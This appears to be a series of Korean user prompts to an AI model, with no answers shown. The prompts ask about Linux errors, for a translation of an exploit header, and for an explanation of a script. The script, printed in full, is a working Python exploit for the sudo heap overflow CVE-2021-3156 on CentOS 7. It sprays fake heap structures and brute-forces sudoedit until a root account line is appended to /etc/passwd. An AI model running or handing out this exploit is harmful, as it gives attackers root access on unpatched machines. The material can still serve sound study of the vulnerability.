question:아래는 뭔가요? (EE) Fatal server error: (EE) PAM authentication failed, cannot start X server. Perhaps you do not have console ownership? (EE) (EE) Please consult the CentOS support at http://wiki.centos.org/Documentation for help. (EE)

question:아래는 어떤 에러인가요? userfaultfd: Function not implemented

question:아래 영어를 한글로 번역해주세요. ''' Exploit for CVE-2021-3156 with struct userspec overwrite by sleepya This exploit requires: - glibc without tcache - sudo version 1.8.9-1.8.23 (inclusive) - patient (and luck). Bruteforcing might take time (almost instant to >10 mins) Note: Disable ASLR before running the exploit if you don't want to wait for bruteforcing Without glibc tcache, a heap layout rarely contains hole. The heap overflow vulnerability is triggered after parsing /etc/sudoers. The parsing process always leaves a large hole before parsed data (struct defaults, struct userspec). Tested on: - CentOS 7 (1.8.23) - Ubuntu 16.04.1 - Debian 9 - Fedora 25 sudo version related info: v1.8.9 - change tq_pop to tailq_list v1.8.11 - move fatal callbacks to util. so cleanup is called correctly v1.8.19 - add line, file to userspec (chunk size 0x50) v1.8.20 - add timeout to cmndspec - add notbefore and notafter to cmndspec v1.8.21 - move timeout in cmndspec to avoid padding (layout is changed) v1.8.23 - add comments to userspec struct (chunk size 0x60) - add ldap field in privileges chunk v1.8.24 - add free_userpsecs() and free_defaults() with TAILQ_FIRST/TAILQ_REMOVE '''

question:아래 코드가 어떤 작업을 하는지 간략히 설명해주세요. #!/usr/bin/python ''' Exploit for CVE-2021-3156 on CentOS 7 by sleepya Simplified version of exploit_userspec.py for easy understanding. - Remove all checking code - Fixed all offset (no auto finding) Note: This exploit only work on sudo 1.8.23 on CentOS 7 with default configuration Note: Disable ASLR before running the exploit (also modify STACK_ADDR_PAGE below) if you don't want to wait for bruteforcing ''' import os import sys import resource from struct import pack from ctypes import cdll, c_char_p, POINTER SUDO_PATH = b"/usr/bin/sudo" # can be used in execve by passing argv[0] as "sudoedit" PASSWD_PATH = '/etc/passwd' APPEND_CONTENT = b"gg:5agemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bashn"; #STACK_ADDR_PAGE = 0x7fffffff1000 # for ASLR disabled STACK_ADDR_PAGE = 0x7fffe5d35000 libc = cdll.LoadLibrary("libc.so.6") libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p) def execve(filename, cargv, cenvp): libc.execve(filename, cargv, cenvp) def spawn_raw(filename, cargv, cenvp): pid = os.fork() if pid: # parent _, exit_code = os.waitpid(pid, 0) return exit_code else: # child execve(filename, cargv, cenvp) exit(0) def spawn(filename, argv, envp): cargv = (c_char_p * len(argv))(*argv) cenvp = (c_char_p * len(env))(*env) return spawn_raw(filename, cargv, cenvp) resource.setrlimit(resource.RLIMIT_STACK, (resource.RLIM_INFINITY, resource.RLIM_INFINITY)) # expect large hole for cmnd size is correct TARGET_CMND_SIZE = 0x1b50 argv = [ "sudoedit", "-A", "-s", PASSWD_PATH, "A"*(TARGET_CMND_SIZE-0x10-len(PASSWD_PATH)-1)+"", None ] SA = STACK_ADDR_PAGE ADDR_REFSTR = pack('<Q', SA+0x20) # ref string ADDR_PRIV_PREV = pack('<Q', SA+0x10) ADDR_CMND_PREV = pack('<Q', SA+0x18) # cmndspec ADDR_MEMBER_PREV = pack('<Q', SA+0x20) ADDR_DEF_VAR = pack('<Q', SA+0x10) ADDR_DEF_BINDING = pack('<Q', SA+0x30) OFFSET = 0x30 + 0x20 ADDR_USER = pack('<Q', SA+OFFSET) ADDR_MEMBER = pack('<Q', SA+OFFSET+0x40) ADDR_CMND = pack('<Q', SA+OFFSET+0x40+0x30) ADDR_PRIV = pack('<Q', SA+OFFSET+0x40+0x30+0x60) # for spraying epage = [ 'A'*0x8 + # to not ending with 0x00 # fake def->var chunk (get freed) 'x21', '', '', '', '', '', '', ADDR_PRIV[:6], '', # pointer to privilege ADDR_CMND[:6], '', # pointer to cmndspec ADDR_MEMBER[:6], '', # pointer to member # fake def->binding (list head) (get freed) 'x21', '', '', '', '', '', '', '', '', '', '', '', '', '', '', # members.first 'A'*0x10 + # members.last, pad # userspec chunk (get freed) 'x41', '', '', '', '', '', '', # chunk metadata '', '', '', '', '', '', '', '', # entries.tqe_next 'A'*8 + # entries.tqe_prev '', '', '', '', '', '', '', '', # users.tqh_first ADDR_MEMBER[:6]+'', '', # users.tqh_last '', '', '', '', '', '', '', '', # privileges.tqh_first ADDR_PRIV[:6]+'', '', # privileges.tqh_last '', '', '', '', '', '', '', '', # comments.stqh_first # member chunk 'x31', '', '', '', '', '', '', # chunk size , userspec.comments.stqh_last (can be any) 'A'*8 + # member.tqe_next (can be any), userspec.lineno (can be any) ADDR_MEMBER_PREV[:6], '', # member.tqe_prev, userspec.file (ref string) 'A'*8 + # member.name (can be any because this object is not freed) pack('<H', 284), '', # type, negated 'A'*0xc+ # padding # cmndspec chunk 'x61'*0x8 + # chunk metadata (need only prev_inuse flag) 'A'*0x8 + # entries.tqe_next ADDR_CMND_PREV[:6], '', # entries.teq_prev '', '', '', '', '', '', '', '', # runasuserlist '', '', '', '', '', '', '', '', # runasgrouplist ADDR_MEMBER[:6], '', # cmnd 'xf9'+'xff'*0x17+ # tag (NOPASSWD), timeout, notbefore, notafter '', '', '', '', '', '', '', '', # role '', '', '', '', '', '', '', '', # type 'A'*8 + # padding # privileges chunk 'x51'*0x8 + # chunk metadata 'A'*0x8 + # entries.tqe_next ADDR_PRIV_PREV[:6], '', # entries.teq_prev 'A'*8 + # ldap_role 'A'*8 + # hostlist.tqh_first ADDR_MEMBER[:6], '', # hostlist.teq_last 'A'*8 + # cmndlist.tqh_first ADDR_CMND[:6], '', # cmndlist.teq_last ] cnt = sum(map(len, epage)) padlen = 4096 - cnt - len(epage) epage.append('P'*(padlen-1)) env = [ "A"*(7+0x4010 + 0x110) + # overwrite until first defaults "x21", "", "", "", "", "", "", "A"*0x18 + # defaults "x41", "", "", "", "", "", "", # chunk size "", "", "", "", "", "", "", "", # next 'a'*8 + # prev ADDR_DEF_VAR[:6]+'', '', # var "", "", "", "", "", "", "", "", # val ADDR_DEF_BINDING[:6]+'', '', # binding ADDR_REFSTR[:6]+'', '', # file "Z"*0x8 + # type, op, error, lineno "x31", "", "", "", "", "", "", # chunk size (just need valid) 'C'*0x638+ # need prev_inuse and overwrite until userspec 'B'*0x1b0+ # userspec chunk # this chunk is not used because list is traversed with curr->prev->prev->next "x61", "", "", "", "", "", "", # chunk size ADDR_USER[:6]+'', '', # entries.tqe_next points to fake userspec in stack "A"*8 + # entries.tqe_prev "", "", "", "", "", "", "", "", # users.tqh_first ADDR_MEMBER[:6]+'', '', # users.tqh_last "", "", "", "", "", "", "", "", # privileges.tqh_first "LC_ALL=C", "SUDO_EDITOR=/usr/bin/tee -a", # append stdin to /etc/passwd "TZ=:", ] ENV_STACK_SIZE_MB = 4 for i in range(ENV_STACK_SIZE_MB * 1024 / 4): env.extend(epage) # last element. prepare space for '/usr/bin/sudo' and extra 8 bytes env[-1] = env[-1][:-len(SUDO_PATH)-1-8] env.append(None) cargv = (c_char_p * len(argv))(*argv) cenvp = (c_char_p * len(env))(*env) # write passwd line in stdin. it will be added to /etc/passwd when success by "tee -a" r, w = os.pipe() os.dup2(r, 0) w = os.fdopen(w, 'w') w.write(APPEND_CONTENT) w.close() null_fd = os.open('/dev/null', os.O_RDWR) os.dup2(null_fd, 2) for i in range(8192): sys.stdout.write('%dr' % i) if i % 8 == 0: sys.stdout.flush() exit_code = spawn_raw(SUDO_PATH, cargv, cenvp) if exit_code == 0: print("success at %d" % i) break